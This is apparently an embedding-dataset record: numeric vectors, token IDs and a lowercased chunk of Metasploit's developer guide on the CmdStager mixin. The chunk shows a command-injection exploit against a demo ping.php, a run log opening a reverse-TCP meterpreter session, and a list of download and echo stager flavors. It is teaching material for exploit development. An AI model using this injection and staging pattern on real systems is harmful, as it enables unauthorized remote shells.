1.1338335275650024, -0.5871217846870422, 0.908383309841156, 0.057411033660173416, 0.18333609402179718, 0.7859854698181152, -1.0555782318115234, 0.07022278010845184, -0.26647162437438965, 0.28094035387039185, 1.3069779872894287, 0.17497777938842773, -0.4160112738609314, -0.41537749767303467, 0.4474813938140869, -0.08204463124275208, 0.1377362459897995, -0.6703310012817383, 0.19966867566108704, 0.8173449635505676, -0.2798863649368286, -0.2081931084394455, 0.516172468662262, -0.46181246638298035, 0.16426123678684235, -0.5333453416824341, -0.025675473734736443, 0.30946895480155945, 0.6462125182151794, -0.26992201805114746, 0.01561050210148096, -0.6351645588874817, 0.0037429684307426214, -0.38944312930107117, -0.8060570359230042, -0.11189001798629761, -0.06571169197559357, 0.2575598955154419, 0.03879625350236893, -0.22568686306476593, 0.30412063002586365, 1.4147220849990845, 1.015735149383545, -0.13673242926597595, -0.09557504206895828, 0.5112516283988953, 0.494527131319046, -1.213257908821106, 0.9216629266738892, 0.08957991003990173, 0.8433083891868591, 0.12199510633945465, 0.4595516324043274, 0.21167582273483276, -0.5741083025932312, -0.46354198455810547, 0.40008068084716797, 0.04572195187211037, 1.1053330898284912, -0.37038159370422363, 0.2874634563922882, 0.7113757133483887, 0.08339869976043701, -1.2119148969650269, 0.16095931828022003, -0.17651581764221191, -1.4799582958221436, -0.4756813049316406, 0.04452947527170181, -0.037234287708997726, 0.4238797426223755, -0.27626341581344604, -0.8604057431221008, 0.769450306892395, 0.6649764180183411, -0.39576128125190735, 0.19170916080474854, 0.42144837975502014, -0.2847907841205597, -0.4511148929595947, -0.401589959859848, -0.27722808718681335, 0.12245237827301025, -0.37085098028182983, 0.42190274596214294, 0.13543753325939178, 0.4617501199245453, -0.004820742178708315, 0.7967343330383301, 0.9462270736694336, 0.43875399231910706, -0.13588623702526093, -0.6508918404579163, 0.30258557200431824, 0.18204738199710846, 0.13037775456905365, -0.14961853623390198, -0.37184110283851624, 0.4764392673969269, 0.24164029955863953, 0.8229581713676453, -0.012083484791219234, -0.7414727210998535, 0.8853141069412231, 0.21642576158046722, -0.20947770774364471, 0.36876243352890015, 0.31213387846946716, 0.9907511472702026, -0.12499397248029709, 0.6259403228759766, 0.49566012620925903, 0.3637368083000183, -0.19698064029216766, -0.42774900794029236, 0.056854188442230225, 0.676608145236969, -0.6742351651191711, 1.2306472063064575, 0.25947755575180054, -0.4020819664001465, -0.6596658229827881, -0.9442471265792847, -0.06616368889808655, 0.3199000954627991, -1.1667487621307373, -0.7146846055984497, 0.25771087408065796, -0.0035628746263682842, -1.1513512134552002, -0.5183832049369812, -0.34924039244651794, 0.9455467462539673, -0.42385387420654297, 0.29632264375686646, -0.013554778881371021, -0.46900010108947754, -0.5320871472358704, -0.2703784704208374, -0.5980978012084961, -0.6138205528259277, -0.3809272348880768, 0.14206328988075256, -0.2626584470272064, -0.1469329446554184, -0.08745235204696655, -0.4113387167453766, -0.49473264813423157, 0.5798283815383911, 0.42601829767227173, 0.6566805839538574, 0.11207488924264908, -0.23108015954494476, -0.5429577231407166, 0.10500828176736832, -0.44134965538978577, 0.615670382976532, -0.10923048853874207, -0.6465422511100769, -0.07446631044149399, -0.5457746982574463, 0.08461419492959976, -0.25644075870513916, 0.6149362325668335, 0.47209468483924866, 0.6982975602149963, 0.32261502742767334, -0.06841520220041275, -0.2919867932796478, 0.5657575130462646, -0.05778820440173149, -0.7753673791885376, 0.19288823008537292, -0.22560250759124756, -0.3253256380558014, 0.6230907440185547, 0.9695355892181396, -0.7757865190505981, 0.8267509937286377, 0.11982079595327377, 0.29066020250320435, -0.6659621000289917, 0.5175317525863647, 0.47743794322013855, 0.07105771452188492, 0.005075815133750439, -0.6258769631385803, 0.06984084099531174, -0.09028341621160507, -0.20784614980220795, -0.4724126160144806, -0.32450437545776367, 0.6429988145828247, 0.027733908966183662, -0.7553666234016418, 0.2953563630580902, -0.11739468574523926, 0.20851407945156097, 0.3489013612270355, -0.2989218831062317, 1.0225774049758911, -0.043709274381399155, 0.5617287755012512, -0.6472901105880737, -0.4816109538078308, 0.09129434078931808, 0.19184814393520355, -0.19190676510334015, -0.680058479309082, 0.5317608714103699, 0.14642773568630219, 0.3986690938472748, 0.5436227917671204, 1.0451583862304688, -0.5543286800384521, -0.005019437987357378, -0.44923046231269836, -0.3117735683917999, -0.14665542542934418, 0.2532072067260742, 0.6494974493980408, 0.19375310838222504, 1.200661063194275, -0.8370369672775269, -0.6977967023849487, 0.47314631938934326, 0.3220179080963135, 0.4236772954463959, -0.48213931918144226, -0.05877944827079773, 0.03941759094595909, -0.3272479176521301, -0.1362113207578659, 0.31887713074684143, 0.32445135712623596, 0.3374350368976593, -0.021611260250210762, 0.5763759016990662, -0.43660852313041687, -0.2384718954563141, 0.2980971932411194, -0.7613508701324463, -0.5425301790237427, 0.7850059866905212, -0.08053699880838394, 0.583799421787262, -0.4386724829673767, -0.14671580493450165, 0.1282641738653183, 0.5556526780128479, 0.6084896922111511, 0.12494020164012909, -0.09075012058019638, -0.36207592487335205, -0.3857325613498688, 0.27369025349617004, -0.3035215139389038, 0.08438070863485336, 0.27715370059013367, 0.6676121354103088, -0.40187087655067444, -0.8739774823188782, -0.7717674374580383, 0.6962453722953796, 1.4171714782714844, 0.6418644785881042, 0.6434735655784607, 0.4383527338504791, 0.20427264273166656, -0.18850068747997284, 0.5514412522315979, -0.35544171929359436, 0.2042982131242752, -0.1574910283088684, 0.3684465289115906, -0.2670998275279999, 0.7498230934143066, 0.34345436096191406, 0.4123140871524811, -0.6974218487739563, 0.09805171191692352, -0.2203558087348938, -0.42168211936950684, -0.6418741345405579, 0.31188952922821045, -0.04987748712301254, 0.5463451147079468, -0.19805148243904114, -0.9994479417800903, -0.286521852016449, 0.8950389623641968, 0.6292731165885925, -0.86899334192276, -0.275455504655838, -0.3159716725349426, 0.14999349415302277, -0.20635047554969788, 0.1477826088666916, -0.21605649590492249, -0.9971949458122253, -0.380188912153244, -0.9983736276626587, 0.532975435256958, 0.3147439658641815, 0.11547582596540451, -0.6793192028999329, -0.6695029139518738, -0.025073982775211334, 0.004319981671869755, -0.3980042636394501, -0.524357795715332, -0.05762074515223503, -0.023754745721817017, -0.029552290216088295, 0.3229254484176636, -0.14119012653827667, -0.16303296387195587, 0.0829722210764885, -0.7447157502174377, 0.4209385812282562, -0.7529850602149963, 0.14173100888729095, 0.5096150040626526, -0.3206685781478882, 0.25046491622924805, -0.08451259136199951, -0.604279100894928, -0.43133744597435, -0.6424341797828674, -0.13356083631515503, -0.6281135082244873, -0.14258317649364471, 0.4006386995315552, -0.33253538608551025, -0.14426758885383606, 0.6138942241668701, 0.39012423157691956, -0.11558754742145538, 0.35505181550979614, -0.05385313928127289, -0.148653045296669, 0.017911028116941452, -0.24127750098705292, 0.688931405544281, -0.164699524641037, 0.5494093298912048, -0.263436496257782, -0.9358069896697998, 1.4060184955596924, 0.3819945454597473, -0.05887303501367569, -0.9170303344726562, -0.6089245080947876, 0.49776989221572876, -0.008349555544555187, 0.23917444050312042, -0.28127822279930115, 0.005149061791598797, -0.19189421832561493, -0.10645943135023117, -0.21305979788303375, -0.7767302393913269, -0.7732192277908325, -0.43743178248405457, -0.443662166595459, 0.25915729999542236, 0.09210140258073807, -0.13330195844173431, -0.02613884024322033, -0.5580894947052002, -0.046336814761161804, -0.5825971364974976, 0.4317619502544403, -0.12498553097248077, -0.42730775475502014, -0.5327419638633728, -0.1372256726026535, -0.4177854657173157, 0.5905815958976746, -0.43961647152900696, 0.07615569978952408, 0.22140949964523315, 0.30366051197052, 0.3598279356956482, -0.511825442314148, -0.7598329782485962, 0.10571294277906418, 0.016261372715234756, -0.46213775873184204, 0.5355933904647827, 0.4506332576274872, -0.2818972170352936, 0.30765700340270996, -0.19935670495033264, -0.5563942193984985, -0.8676547408103943, -0.6934122443199158, 0.6128655076026917, -0.17120636999607086, 0.051847681403160095, -0.7010998129844666, -0.8111655712127686, -0.3255988657474518, 0.05582950636744499, 0.20559756457805634, -1.8357810974121094, -0.15624310076236725, -0.3636036813259125, 0.260221928358078, -0.02528822422027588, -0.3314719796180725, -0.21113035082817078, -0.9872414469718933, -0.45852887630462646, 0.6988638043403625, 0.5307590961456299, 0.37701940536499023, -0.21360017359256744, -0.22759650647640228, 0.5023536682128906, 0.0052444604225456715, -0.502235472202301, -0.3871554136276245, 0.08250915259122849, 0.10558444261550903, -0.5217835903167725, 0.4988352656364441, -0.5732905268669128, 0.4875320494174957, -0.3436625897884369, 0.5982040166854858, -0.09266973286867142, 0.45196229219436646, 0.18941734731197357, 0.21999002993106842, 0.21951459348201752, -0.8971109390258789, 0.4226861894130707, -0.5331724286079407, 0.6261162757873535, 0.27892258763313293, 0.5212736129760742, -0.34336838126182556, 0.14079870283603668, -0.9471356868743896, -1.2946364879608154, 0.8754718899726868, -0.19273698329925537, -0.3381207585334778, 0.09293540567159653, -0.09000197798013687, 1.0783023834228516, -0.7077412605285645, 0.5578840374946594, 0.8018946647644043, 0.4736558794975281, 0.21945464611053467, -0.42114660143852234, 0.3569263815879822, 0.4647596776485443, -0.29784679412841797, 0.4892624020576477, 0.5357667207717896, 0.11221903562545776, -0.4797910749912262, -0.10761647671461105, 0.08129209280014038, -0.2514191269874573, -0.12149915099143982, 0.7012218832969666, -0.548596203327179, 0.5909660458564758, -0.41066157817840576, -0.6616093516349792, -0.41204318404197693, 0.007539127487689257, 0.1959950029850006, 0.2412976324558258, -0.018810665234923363, 0.844815194606781, 0.7470623850822449, -0.2735440731048584, -0.16599194705486298, -0.24266281723976135, -0.1517850160598755, 0.33753204345703125, 0.4434358477592468, -0.8798565864562988, 0.9916228652000427, 0.15555372834205627, -1.0878300666809082, -0.8669329881668091, -0.9365054368972778, -0.42420923709869385, -0.1981411725282669, -0.205211341381073, -0.6897354125976562, -0.09898384660482407, 0.19037899374961853, 0.3095609247684479, 0.46624264121055603, 0.041194066405296326, -0.17091843485832214, -0.4633769690990448, 0.1341792494058609, -0.1977701634168625, 0.2618187963962555, 0.9576083421707153, -0.4511440098285675, -0.06872344017028809, -0.6909797787666321, -0.37669235467910767, 0.030552946031093597, 0.5753538608551025, 0.6592468023300171, 0.5652745962142944, 1.069516897201538, 0.2881945073604584, -0.3941120505332947, 1.0104186534881592, -0.555168092250824, 0.733422040939331, 0.7015228271484375, -0.4495214819908142, -1.054376482963562, -0.5812501311302185, -0.4291790723800659, 0.3047706186771393, 0.640216588973999, 0.046987082809209824, 0.019648101180791855, -0.36830899119377136, 0.046069901436567307, -0.12217187881469727, -0.9948849081993103, -0.22270144522190094, -0.9662885665893555, -0.02095821499824524, 0.46962428092956543, 0.24366694688796997, 0.6245439052581787, 0.0717000737786293, 0.042652737349271774, -0.7661585807800293, -0.6771460771560669, 0.13324996829032898, 0.14161284267902374, -0.33884453773498535, 0.036092594265937805, 0.3171209692955017, -0.8724037408828735, -0.3256029486656189, -0.4545486569404602, -0.02364555560052395, 0.1386645883321762, -1.1660417318344116, 0.00976962223649025, 0.287978857755661, -0.23218083381652832, 0.11083028465509415, -0.5353860259056091, -0.2874164581298828, 0.47420403361320496, -0.7409316897392273, 0.3978435695171356, 0.49748891592025757, -0.6613935828208923, 0.6992574334144592, 0.15149961411952972, 0.00808607880026102, 0.48272550106048584, -0.3084280788898468, 0.0976361334323883, -0.570016086101532, 0.4764048755168915, 1.0379654169082642, 0.14403103291988373, -1.1971336603164673, 0.5157716870307922, -0.28754639625549316, -0.7700862884521484, -0.11466047167778015, -0.5035321116447449, 0.04557571932673454, 0.0903763473033905, -0.2107919156551361, 0.2000211477279663, 0.2939941883087158, 0.15293624997138977, 0.35079890489578247, -0.18544726073741913, 0.5737876296043396, 0.47104671597480774, 0.05817613750696182, -0.1523900032043457, 0.04472126066684723, -0.03914206102490425, -0.08085435628890991, 0.2787362039089203, 0.4964340031147003, 0.3428824245929718, 0.5821036696434021, -0.1495605707168579, -0.1405361294746399, -0.40479743480682373, -0.10412180423736572, -0.08665216714143753, 0.5276677012443542, -0.3320298194885254, 0.14449073374271393, 0.7602686285972595, -0.26697108149528503, -0.6299098134040833, 0.2796093821525574, -0.5560696721076965, 0.06103858724236488, 0.596741259098053, -0.20434406399726868, -0.48418208956718445, -0.6098887920379639, 0.24468594789505005, -0.6869571805000305, -0.22728411853313446, 0.36499375104904175, 0.580525815486908, 0.126548632979393, 0.09447350353002548, 0.7081471085548401, -0.46630945801734924, -0.442848265171051, -0.2669926881790161, 0.18875053524971008, -0.6759194731712341, -0.8182738423347473, 0.5993461012840271, 0.9664830565452576, 0.27440741658210754, 0.23810485005378723, -0.34815141558647156, -0.1973385363817215, 0.14760015904903412, -0.06901978701353073, 0.10595964640378952, 0.37986722588539124, -0.5694436430931091, 0.5982545018196106, -0.32496312260627747, 0.23941504955291748, 0.00409341836348176, -0.42802703380584717, 0.25510579347610474, -0.025156239047646523, -0.25342583656311035, 0.8936151266098022, 0.13187702000141144, 0.04137696325778961, 1.2265878915786743, 1.0051283836364746, 0.3977525234222412, -0.6507939696311951, 0.1219911202788353, -0.23411336541175842, 0.3036036193370819, 0.2606017589569092, 0.40523162484169006, 0.11082259565591812, 0.6651684045791626, 0.4533964991569519, -1.1818324327468872, 0.1288866251707077, 0.8354464769363403, 0.07949747890233994, -0.17773304879665375, 0.06969881802797318, -0.3155331313610077, 0.6934874057769775, -0.1470508724451065, 0.1361854523420334, 0.5809891819953918, 0.21072527766227722, 0.1116078794002533, -0.7517501711845398, 0.0059676761738955975, -0.03843315690755844, -0.5795565843582153, 0.12714558839797974, 0.1567850559949875, -0.20767582952976227, 0.708039402961731, 0.6616209745407104, -0.7034189701080322, 0.3796917796134949, 0.7882643938064575, 0.7661389112472534, -0.6965532302856445, 0.5267333984375, -0.16553020477294922, 0.7287794351577759, 0.08095293492078781, 0.1577225625514984, -0.3049652874469757, 0.3056068420410156, 0.36019662022590637, -0.490104079246521, -0.3041965365409851, -0.20570257306098938, -0.06310136616230011, 0.44702595472335815, -0.020399289205670357, 0.10815437138080597, 0.3577882945537567, -0.21727147698402405, 0.4136478900909424, -0.6914894580841064, -0.41893821954727173, 0.7539310455322266, -0.5062910914421082, -0.14408385753631592, 1.0072935819625854, 0.028710799291729927, 0.20330165326595306, -0.5266078114509583, 1.0853558778762817, -0.024219809100031853, 0.5701407194137573, -0.16957974433898926, -0.20238439738750458, -0.37834882736206055, 0.14572013914585114, -0.6695098280906677, -0.47936582565307617, -0.0012840282870456576, -0.09084158390760422, 0.6883653402328491, -0.3452436327934265, 0.05646354332566261, -0.4706072509288788, 0.007263536565005779, -0.11155834794044495, -0.6716883182525635, 0.4325636327266693, -0.05179769918322563, -0.7703872919082642, -0.015007544308900833, 0.30926597118377686, 0.06785225123167038, 0.18626047670841217, -0.3245026767253876, -1.054230809211731, -0.4105525016784668, -0.07550081610679626, -0.4417119324207306, 0.7111281752586365, -0.2921125590801239, -0.1975143700838089, 0.07120463997125626, -0.4065905511379242, -0.18487374484539032, 0.30118975043296814, -0.5744674801826477, -0.1150042712688446, 0.5592139959335327, 0.5277027487754822, 0.617605447769165, 0.26006901264190674, -0.05069643259048462, -0.3581295311450958, 0.6340193152427673, 0.7521446347236633, 0.10603184998035431, 0.6181435585021973, 0.14284619688987732, 0.2961663007736206, -0.016491059213876724, 0.13835449516773224, 0.02623564377427101, -0.42731085419654846, -0.25249484181404114, -0.19616495072841644, 0.28118303418159485, -1.2033435106277466, -0.47761207818984985, 0.5471264123916626, 0.44434159994125366, 0.7700043320655823, -0.31307336688041687, -0.9916731715202332, -0.1571938693523407, -0.45676562190055847, -0.17471717298030853, -0.36575236916542053, -0.3092142641544342, 0.03157900273799896, -0.2114940881729126, 0.6224523186683655, -0.940897524356842, 4.341296672821045, 0.14530691504478455, 0.25601834058761597, 0.5244963765144348, -0.12729544937610626, 0.44876450300216675, 1.0416743755340576, -0.8231693506240845, 0.29849714040756226, -0.6378847360610962, 0.3203434646129608, -0.2676020562648773, 0.22999104857444763, 0.8245015144348145, 0.4822161793708801, 0.21796159446239471, -0.7388477325439453, -0.0555516853928566, 0.34643691778182983, -0.9277936220169067, -0.911878764629364, -0.14509449899196625, -0.1870519518852234, 1.3312139511108398, -0.2693076729774475, 0.3307921886444092, 0.48513922095298767, -0.4697013199329376, -0.04324933886528015, -0.06878482550382614, -0.00692280987277627, -0.2506732642650604, 0.20481477677822113, 0.23559173941612244, -0.31374412775039673, -0.05662744119763374, -0.20842702686786652, -0.6338756084442139, -0.5533835291862488, -0.91385817527771, 0.9029133319854736, 0.3626246452331543, 0.16988910734653473, -0.29684656858444214, 0.20902584493160248, 0.6673876643180847, -0.6601247787475586, 0.6033125519752502, 0.562751293182373, -0.5994386076927185, 0.17936742305755615, -0.20939457416534424, 0.7242933511734009, -0.23079295456409454, -0.9579158425331116, 0.34078454971313477, -0.008798393420875072, -0.00197398173622787, 0.16955532133579254, 0.5693424940109253, 0.41087982058525085, -0.2438134402036667, 0.35283809900283813, -0.1503424346446991, -1.0571759939193726, -0.25283029675483704, -0.22954557836055756, 0.20407602190971375, 0.2932594418525696, -0.06275878101587296, 0.018617302179336548, -0.305594801902771, 0.1640375554561615, -0.3448333144187927, 0.4845131039619446, 0.18095959722995758, 0.054237328469753265, 0.09655595570802689, 0.3197714686393738, -0.4188036322593689, -0.26049986481666565, -0.6765980124473572, -1.2201991081237793, 0.42141711711883545, 0.49659210443496704, 0.1365203559398651, -0.09560032933950424, -0.9568274021148682, -0.020843442529439926, 0.10532728582620621, 0.17276300489902496, 0.5851720571517944, -0.12210499495267868, 0.9449937343597412, 0.14571747183799744 ]
[ 4017, 1996, 6263, 1010, 2023, 2003, 2129, 2115, 18077, 2323, 2707, 2043, 2017, 1521, 2128, 2478, 1996, 4642, 5104, 26702, 2099, 4666, 2378, 1024, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 4635, 1027, 3671, 26763, 2075, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4642, 5104, 26702, 2099, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 3094, 13341, 2478, 4642, 5104, 26702, 2099, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2023, 20397, 1037, 3094, 13341, 2478, 1996, 3094, 2754, 2099, 1012, 1065, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 26403, 2509, 2099, 1005, 1033, 1010, 1005, 7604, 1005, 1027, 1028, 1031, 1031, 1005, 24471, 2140, 1005, 1010, 1005, 24471, 2140, 1024, 1013, 1013, 18804, 13102, 4135, 4183, 1012, 4012, 1005, 1033, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 11603, 1005, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 11603, 1005, 1010, 1063, 1065, 1033, 1033, 1010, 1005, 18093, 1005, 1027, 1028, 1063, 1005, 2919, 7507, 2869, 1005, 1027, 1028, 1000, 1032, 1060, 8889, 1000, 1065, 1010, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 6140, 2546, 1005, 1033, 1010, 1005, 21598, 1005, 1027, 1028, 6270, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 2355, 1011, 5757, 1011, 2184, 1005, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1007, 1007, 2203, 13366, 15389, 1035, 3094, 1006, 4642, 2094, 1010, 23569, 2015, 1027, 1063, 1065, 1007, 1001, 4455, 2070, 4118, 2000, 1999, 20614, 4642, 2094, 2000, 1996, 8211, 3642, 1012, 2203, 13366, 18077, 6140, 1035, 3570, 1006, 1005, 18077, 2075, 1012, 1012, 1012, 1005, 1007, 15389, 1035, 4642, 5104, 26702, 2099, 2203, 2203, 2004, 2017, 2064, 2156, 1010, 2057, 2031, 4217, 1996, 1523, 6140, 2546, 1524, 14894, 2004, 2256, 3094, 2754, 2099, 1012, 2057, 2097, 4863, 2062, 2055, 2023, 2101, 1010, 2021, 10468, 2054, 2009, 2515, 2003, 2009, 7009, 2256, 18093, 2000, 1013, 1056, 8737, 1998, 15389, 2015, 2009, 1012, 2085, 2292, 1521, 1055, 19933, 1996, 15389, 1035, 3094, 4118, 1998, 2131, 3642, 7781, 2114, 1996, 3231, 2553, 1012, 2241, 2006, 1996, 13433, 2278, 1010, 2057, 2113, 2008, 2256, 13341, 5164, 2323, 2298, 2066, 2023, 1024, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1009, 1003, 2656, 1003, 2656, 1009, 1031, 24391, 10954, 1033, 2057, 2079, 2008, 1999, 15389, 1035, 3094, 2478, 8299, 20464, 11638, 1012, 5060, 2045, 2003, 2941, 2070, 2919, 2839, 22910, 2920, 2000, 2131, 1996, 18077, 2551, 11178, 1010, 2029, 2003, 3517, 1024, 13366, 11307, 1035, 2919, 1035, 25869, 2015, 1006, 4642, 2094, 1007, 4642, 2094, 1012, 28177, 12083, 999, 1006, 1013, 10381, 5302, 2094, 1032, 1009, 1060, 1013, 1010, 1005, 10381, 5302, 2094, 6255, 2581, 1005, 1007, 4642, 2094, 1012, 28177, 12083, 999, 1006, 1013, 1025, 1013, 1010, 1005, 1003, 2656, 1003, 2656, 1005, 1007, 4642, 2094, 1012, 28177, 12083, 999, 1006, 1013, 1013, 1010, 1005, 1009, 1005, 1007, 2203, 13366, 15389, 1035, 3094, 1006 ]
metasploit
107.txt
5
cmd, _ opts = { } ) send _ request _ cgi ( {'method'= >'get ','uri'= >'/ ping. php ','encode _ params'= > false,'vars _ get'= > {'ip'= > " 127. 0. 0. 1 + % 26 % 26 + # { filter _ bad _ chars ( cmd ) } " } } ) end def exploit print _ status ('exploiting...') execute _ cmdstager end and let ’ s run that, we should have a shell : msf exploit ( cmdstager _ demo ) > run [ * ] started reverse tcp handler on 10. 6. 0. 92 : 4444 [ * ] exploiting... [ * ] transmitting intermediate stager for over - sized stage... ( 105 bytes ) [ * ] sending stage ( 1495599 bytes ) to 10. 6. 0. 92 [ * ] meterpreter session 1 opened ( 10. 6. 0. 92 : 4444 - > 10. 6. 0. 92 : 51522 ) at 2016 - 06 - 10 11 : 51 : 03 - 0500 flavorsnow that we know how to use the msf : : exploit : : cmdstager mixin, let ’ s take a look at the command stagers you can use. as mentioned above there are 2 general approaches to staging an executable on disk : by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. this delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. it is also useful to know the printf flavor is the only flavor that embeds the payload into the commands but does not use echo. available flavors : flavors requiring the payload to be broken apart and embedded into the commands : bournecertutildebug _ asmdebug _ writeechoprintfvbsflavors that rely on using a command to retrieve the payload via network connectioncurlfetchlwprequestpsh _ in
[ -0.046258799731731415, -0.4965841472148895, -0.35780635476112366, 1.1314029693603516, -0.21853585541248322, -0.03763618692755699, -0.5524558424949646, 0.04925944656133652, 0.09560750424861908, 0.7023510336875916, -0.03497464209794998, -0.2020767629146576, 0.562575101852417, -0.6763715147972107, -0.404975026845932, -0.366115540266037, -0.5650705695152283, -0.4187711477279663, -1.243004560470581, 0.12354927510023117, 0.07111186534166336, -0.11283311247825623, -0.5060948133468628, -0.3802371323108673, -0.18283776938915253, 0.2925586700439453, -0.05609859153628349, 0.031170988455414772, 0.5154189467430115, 0.1487945318222046, 0.6218175888061523, -0.2947801947593689, 0.3311108350753784, -0.7550915479660034, 0.19049930572509766, 0.19126340746879578, 0.5268406867980957, -0.21264226734638214, 0.5614674091339111, -0.31703582406044006, 0.25329580903053284, -0.6744399666786194, 0.18124240636825562, -0.28215864300727844, -0.5023772716522217, -0.501039981842041, 0.4055369198322296, -0.3066861629486084, 0.9763533473014832, 0.0904083326458931, 0.5452585220336914, 0.1774260401725769, -0.32257279753685, 0.32479044795036316, 0.34219905734062195, 0.12293731421232224, 0.06506333500146866, 0.18803533911705017, -0.25681209564208984, 0.06446523219347, -0.22482751309871674, 0.6497255563735962, 0.41975924372673035, -0.8041908740997314, 0.00005056257577962242, -0.3312293589115143, -0.38739684224128723, -0.1829548329114914, -0.6119678616523743, -0.11412832140922546, 0.08419173210859299, 0.5446788668632507, -0.38615697622299194, -0.34515783190727234, -0.4360169470310211, -0.28161484003067017, 0.21807117760181427, -0.48861458897590637, -0.28325268626213074, 0.7459604144096375, -0.27833497524261475, 0.15125510096549988, 0.4993835985660553, -0.487234890460968, 0.09587742388248444, -0.14588655531406403, 0.64589923620224, 0.6767775416374207, -0.13828547298908234, 0.2211996614933014, 0.6223013401031494, 0.2889890670776367, -0.853909969329834, -0.3314337432384491, 0.10047540068626404, 0.4287536144256592, -0.7432787418365479, 0.3045431673526764, 0.3781600296497345, -0.2113191783428192, 1.110000491142273, 0.3924539089202881, 0.18336504697799683, 0.23816831409931183, -0.4997088313102722, 0.38038548827171326, 0.060626786202192307, -0.34497782588005066, -0.1642538607120514, -0.185943603515625, 0.43198513984680176, 0.16065546870231628, -0.15118759870529175, -0.7027894258499146, 0.02709808014333248, 0.09252835065126419, 0.1557704508304596, 0.38003432750701904, -0.30315494537353516, 1.0733691453933716, -0.4301486611366272, -0.9233176708221436, 0.00251980684697628, -0.3401351273059845, 0.3281061053276062, -0.19581949710845947, 0.024502256885170937, 0.8330614566802979, -0.6101414561271667, -0.5011641383171082, -0.12270458042621613, -0.14589786529541016, -0.3495579659938812, 0.5700827836990356, -0.5480114221572876, 0.7645509839057922, 0.13575728237628937, 0.392726868391037, 1.1715344190597534, -0.8687707781791687, -0.1374947875738144, 0.26575207710266113, 0.6622496843338013, 1.3732637166976929, 0.49522873759269714, -0.37252354621887207, -0.18796925246715546, 0.31838589906692505, -0.30089426040649414, 0.5612879395484924, -0.5738559365272522, -0.12354086339473724, 0.7095860838890076, -0.16520071029663086, -0.9292923212051392, 0.44435915350914, -0.47771281003952026, 0.5943293571472168, -0.06312327831983566, 0.2663572132587433, -0.1717652529478073, 0.5586147904396057, -0.060509052127599716, 0.17201738059520721, -0.29816490411758423, 0.2782837748527527, -0.4082257151603699, -0.35539510846138, -0.48407140374183655, 0.009458942338824272, 0.3837122321128845, -0.32243743538856506, -0.5188705921173096, -0.1560889184474945, 1.2771879434585571, 1.0111953020095825, -0.21696804463863373, -0.22277213633060455, 0.7971824407577515, 0.28579291701316833, -1.1531175374984741, 0.5972906351089478, 0.6257359385490417, 0.7065402865409851, -0.025948982685804367, 0.1715022772550583, -0.3283296823501587, -0.4630480706691742, -0.5787237286567688, -0.1423584371805191, -0.04746025800704956, 1.0254943370819092, -0.5751599669456482, 0.22406093776226044, 0.646700382232666, 0.34352871775627136, -1.0869674682617188, 0.2874961197376251, -0.11910715699195862, -1.4626051187515259, -0.1780305951833725, 0.261406809091568, -0.41030752658843994, 0.9591495394706726, -0.7328197360038757, -0.1122654601931572, 0.8856867551803589, 0.7310634255409241, -0.2203969806432724, 0.8440479636192322, 0.8050196766853333, -0.32023122906684875, -0.5008446574211121, -0.488753080368042, -0.30153727531433105, 0.02694060280919075, -0.7192840576171875, 0.4402114450931549, -0.05893363058567047, 0.33281415700912476, 0.1861085295677185, 0.22996750473976135, 0.8600404262542725, 0.08685826510190964, 0.42416107654571533, -0.5559967160224915, 0.15195132791996002, 0.5671765208244324, -0.5227341055870056, -0.36203309893608093, -0.2780399024486542, 0.2942676544189453, 0.7542266845703125, 0.7214334011077881, 0.3582591414451599, -0.5649553537368774, 0.814836859703064, 0.22812262177467346, 0.42255616188049316, 0.33430275321006775, 0.4414384067058563, 0.7813839912414551, 0.22045695781707764, 0.2923390567302704, 0.4073280692100525, 0.3390968441963196, -0.08543496578931808, -0.7791834473609924, 0.44994381070137024, 0.30667150020599365, -0.15966999530792236, 0.8941054344177246, 0.10028858482837677, -0.528471827507019, -0.560391366481781, -0.6200589537620544, 0.1574966311454773, 0.7814507484436035, -1.3211426734924316, -1.109265685081482, -0.17085659503936768, 0.29767942428588867, -0.6075971722602844, -0.22987374663352966, -0.016785768792033195, 0.4822864830493927, -0.4783132076263428, 0.5873345136642456, -0.39539435505867004, -0.24473586678504944, -0.7672882080078125, -0.7046967148780823, -0.9823099374771118, -0.7338790893554688, -0.40422192215919495, 0.2887694239616394, -0.013566214591264725, -0.14205847680568695, 0.43605417013168335, 0.0016027821693569422, -0.7669751048088074, 0.3548450767993927, 0.5037080645561218, 0.8593617081642151, -0.1762954294681549, -0.23097503185272217, -0.7373764514923096, 0.617672324180603, -0.062418948858976364, 0.7005511522293091, -0.12577351927757263, -0.6625761389732361, 0.08126342296600342, -0.36428773403167725, -0.03237564116716385, -0.3502299189567566, 0.7492958903312683, 0.19153523445129395, 0.3245905041694641, 0.046672508120536804, 0.3348812460899353, -0.2983366847038269, 0.22828556597232819, 0.3181000053882599, -0.7786038517951965, 0.27772074937820435, -0.16010883450508118, -0.4712246060371399, 0.01047525741159916, 0.44959408044815063, -0.9267011284828186, 0.7676749229431152, -0.23658804595470428, 0.8006815910339355, -0.8684998750686646, 0.7337467074394226, 0.4322112798690796, 0.04641805216670036, 0.08270351588726044, -0.26787418127059937, 0.2026057243347168, -0.08893158286809921, -0.14958488941192627, -0.9167366623878479, -0.7041823863983154, 0.23809951543807983, 0.4214169383049011, -0.7056931257247925, 0.36216098070144653, 0.13691820204257965, 0.15852975845336914, -0.08216752111911774, -0.7561428546905518, 0.6173526048660278, -0.09189687669277191, 0.24283276498317719, -0.4233570396900177, 